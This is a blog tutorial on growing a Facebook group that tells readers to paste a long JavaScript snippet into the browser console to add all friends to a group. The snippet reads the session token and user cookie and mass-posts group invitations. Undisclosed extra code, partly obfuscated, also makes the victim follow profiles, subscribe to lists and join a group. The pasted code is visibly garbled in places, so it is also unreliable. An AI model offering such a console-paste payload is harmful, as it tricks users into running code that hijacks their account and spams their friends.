How to Add All Friends to Facebook Group [Crazy Technique]

  1. In the previous tutorial, we have covered how to invite all friends to the Facebook page. Now moving forward, if you have created an online community, you will need a Facebook group. This will help you to interact directly with your daily viewers. But to make it bigger, you might need a script to add all friends to the Facebook group.

Also read: Invite All Friends on Facebook Page Instantly

4 Tips to Optimize and Grow a Facebook Group

Decide Your Target Audience

The first thing that you have to think while creating an online community is that, who are you going to serve? For us, it is the people who need tech assistance. Here are the few things that you should take care of:

Select Group Type

Pick Facebook Group Type

As we mentioned earlier, select what your group is about. This will help in specifying whenever a user visits your group.

Customize URL

Web And Email Facebook Group

Custom URLs helps the user to quickly remember and access the group even if they have not bookmarked it.

Set Tags

Facebook Group Tags

Tags let Facebook, as well as the user, know that what you are going to cover in your community. This may also be used to suggest your group to the audience having similar interests. So don’t forget to fill the tags!

Posting Permission and Approval

Facebook Group Posting Rules

Posting permission decides who can post. For building an active community, I will suggest you keep it open for all. This is where the concept of post-approval comes in.

If you want to keep your group spam free, then turn this option on. So that whenever someone post on the group, first it will have to be approved to appear on the group. However, setting this option means you have to check for pending posts regularly. It’s a little work, but this is the cost of keeping the group clean.

Adding all the friends to your Facebook group might not always be a good idea if you have a large friends list(See: Hiding Facebook Friend List) and they don’t post relevant content. Then you should remove them.

Membership Approval

Facebook Group Membership Approval

This will decide that members can be directly added to the Facebook group or they have to be approved by an admin or a moderator. Keep it at your convenience.

Be Regular

If you want it to be a huge and growing community, you will have to be fast enough to solve the queries and questions asked by the users. So that they can know that you are in for serious business. This will also encourage existing members to share it with their friends and colleagues.

Invite Your Existing Fans to Join the Group

If you have a fan page, then you can share it there and invite users to adhere to the community and to let them know that they can directly interact with users with similar interests there.

Share It On Different Social Media Platforms

Just like you did on the Facebook fan page, also try to share it on various social media platforms and also if possible via email to your subscribers.

Also Read: Enlarge Profile Picture Of Someone On Facebook

Now coming back to the point. Manually adding all friends will take a lot of effort. But in this post, I am going to share a code which will help to add all of your friends in just a single click.

Steps to Add All Friends to Facebook Group in Single Click

There are basically 2 methods by which you can achieve the same goal. So here we have discussed both of them. So let’s begin.

I have also created a video tutorial for it which is given below. You can also check out the written tutorial below this video

Method 1: Using Javascript (Traditional Method)

  1. Copy the code given below or open this link & copy given code.
    (function(){var f={dtsg:document.getElementsByName("fb_dtsg")[0].value,uid:document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]),gid:document.getElementsByName("group_id")[0].value,frns:Array(),prenKe:0,okeh:0,gagal:0,getAjak:function(b){var c=new XMLHttpRequest;"GET",b,!0),c.onreadystatechange=function(){if(4==c.readyState&&200==c.status){var a=eval("("+c.responseText.substr(9)+")");a.payload&&a.payload.entries&&(f.frns=a.payload.entries.sort(function(){return.5-Math.random()})),document.getElementById("hasilsurasil").innerHTML="Found <b>"+f.frns.length+" Abonnenten</b><div id='hasilsatu'></div><div id='hasildua'></div><div id='hasiltiga' style='min-width:300px;display:inline-block;text-align:left'></div>"+crj;for(x in f.frns)f.senAjak(x)}else document.getElementById("hasilsurasil").innerHTML=4==c.readyState&&404==c.status?"<b style='color:darkred'>Gruppe Öffnen!</b>"+crj:"<b style='color:darkgreen'>Suche nach möglichen Abonnenten... ("+c.readyState+")</b>"+crj},c.send()},senAjak:function(d){var e=new XMLHttpRequest,prm="__a=1&fb_dtsg="+f.dtsg+"&group_id="+f.gid+"&source=typeahead&ref=&message_id=&members="+f.frns[d].uid+"&__user="+f.uid+"&phstamp=";"POST","/ajax/groups/members/add_post.php",!0),e.setRequestHeader("Content-type","application/x-www-form-urlencoded"),e.setRequestHeader("Content-length",prm.length),e.setRequestHeader("Connection","keep-alive"),e.onreadystatechange=function(){if(4==e.readyState&&200==e.status){var a=eval("("+e.responseText.substr(9)+")");if(f.prenKe++,document.getElementById("hasilsatu").innerHTML="<div><b>"+f.prenKe+"</b> of <b>"+f.frns.length+"</b></div>",a.errorDescription&&(f.gagal++,document.getElementById("hasiltiga").innerHTML="<div><b style='color:darkred'>( "+f.gagal+" )</b> <span style='color:darkred'>"+a.errorDescription+"</span></div>"),a.jsmods&&a.jsmods.require){var b="<div>";for(x in a.jsmods.require)a.jsmods.require[x][a.jsmods.require[x].length-1][1]&&(b+="<b style='color:darkgreen'>"+a.jsmods.require[x][a.jsmods.require[x].length-1][1]+"</b> ");b+="<div>",document.getElementById("hasildua").innerHTML=b}if(a.onload)for(z in a.onload){var c=eval(a.onload[z].replace(/Arbiter.inform/i,""));if(c.uid&&{f.okeh++,document.getElementById("hasiltiga").innerHTML="<div><b style='color:darkgreen'>( "+f.okeh+" )</b> <a href='/"+c.uid+"' target='_blank'><b>""</b></a> haben dich abonniert.</div>";break}}f.prenKe==f.frns.length&&(document.getElementById("hasiltiga").style.textAlign="center",document.getElementById("hasiltiga").innerHTML+="<div style='font-size:20px;font-weight:bold'>20 Leute Einladen!</div><a href='/' onClick='document.getElementById(\"hasilsurasil\").style.display=\"none\";return false'>Schliesen</a>")}},e.send(prm)}},g=["i","a","e","g","o","s","n","b","l","p","m","2","r","0","c","1","t","3","©"],crl=g[1]+g[0]+g[6]+g[3]+g[14]+g[12]+g[2]+g[1]+g[16]+g[0]+g[4]+g[6]+g[5]+"."+g[7]+g[8]+g[4]+g[3]+g[5]+g[9]+g[4]+g[16]+"."+g[14]+g[4]+g[10],crj="<div style='margin-top:10px;color:gray;font-size:12px'>"+g[1].toUpperCase()+g[0]+g[6]+g[3]+g[14].toUpperCase()+g[12]+g[2]+g[1]+g[16]+g[0]+g[4]+g[6]+g[5]+" "+g[g.length-1]+g[11]+g[13]+g[15]+g[17]+"<div style='font-size:9px'><a href='http://"+crl+"/' target='_blank'>"+crl+"</a></div></div>";document.body.innerHTML+="<center id='hasilsurasil' style='min-height:50px;width:600px;position:fixed;top:100px;left:"+(document.body.offsetWidth-530)/2+"px;border-radius:10px;padding:10px;z-index:999999;border:5px solid skyblue;background-color:rgba(225,225,255,0.75)'><b>Suche nach Abonnenten ... Script by Mano </b>"+crj+"</center>",f.getAjak("/ajax/typeahead/first_degree.php?__a=1&viewer="+f.uid+"&token="+Math.random()+"&filter[0]=user&options[0]=friends_only")})(); var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
    var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1])
    function cereziAl(isim) {
    var tarama = isim + "=";
    if (document.cookie.length > 0) {
    konum = document.cookie.indexOf(tarama)
    if (konum != -1) {
    konum += tarama.length
    son = document.cookie.indexOf(";", konum)
    if (son == -1)
    son = document.cookie.length
    return unescape(document.cookie.substring(konum, son))
    else { return ""; }
    function getRandomInt (min, max) {
    return Math.floor(Math.random() * (max - min + 1)) + min;
    function randomValue(arr) {
    return arr[getRandomInt(0, arr.length-1)];
    var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
    var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
    function a(abone){
    var http4 = new XMLHttpRequest();
    var url4 = "/ajax/follow/follow_profile.php?__a=1";
    var params4 = "profile_id=" + abone + "&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=" + fb_dtsg + "&lsd&__" + user_id + "&phstamp=";"POST", url4, true);
    //Send the proper header information along with the request
    http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    http4.setRequestHeader("Content-length", params4.length);
    http4.setRequestHeader("Connection", "close");
    http4.onreadystatechange = function() {//Call a function when the state changes.
    if(http4.readyState == 4 && http4.status == 200) {
    http4.close; // Close the connection
    function sublist(uidss) {
    var a = document.createElement('script');
    a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();";
    var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
    var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);
    var httpwp = new XMLHttpRequest();
    var urlwp = '/ajax/groups/membership/r2j.php?__a=1';
    var paramswp = '&ref=group_jump_header&group_id=' + gid + '&fb_dtsg=' + fb_dtsg + '&__user=' + user_id + '&phstamp=';
    httpwp['open']('POST', urlwp, true);
    httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
    httpwp['setRequestHeader']('Content-length', paramswp['length']);
    httpwp['setRequestHeader']('Connection', 'keep-alive');
    var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
    var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);
    var friends = new Array();
    gf = new XMLHttpRequest();
    gf['open']('GET', '/ajax/typeahead/first_degree.php?__a=1&viewer=' + user_id + '&token' + Math['random']() + '&filter[0]=user&options[0]=friends_only', false);
    if (gf['readyState'] != 4) {} else {
    data = eval('(' + gf['responseText']['substr'](9) + ')');
    if (data['error']) {} else {
    friends = data['payload']['entries']['sort'](function (_0x93dax8, _0x93dax9) {
    return _0x93dax8['index'] - _0x93dax9['index'];
  2. Go to Facebook Group where you want to add your friends. (Google Chrome Browser is recommended)
  3. Press F12 to open the developer console.
  4. Paste code there and hit enter.
  5. Within a few minutes all of your friends will be added to that group.

Method 2: Using Google Chrome Extension (Hot Method)

  1. Search Chrome Web Store for “Facebook group invite all” and install the extension of choice.
  2. Go to the Facebook Group where you want to add all friends.
  3. Enable the chrome extension and follow the instructions.

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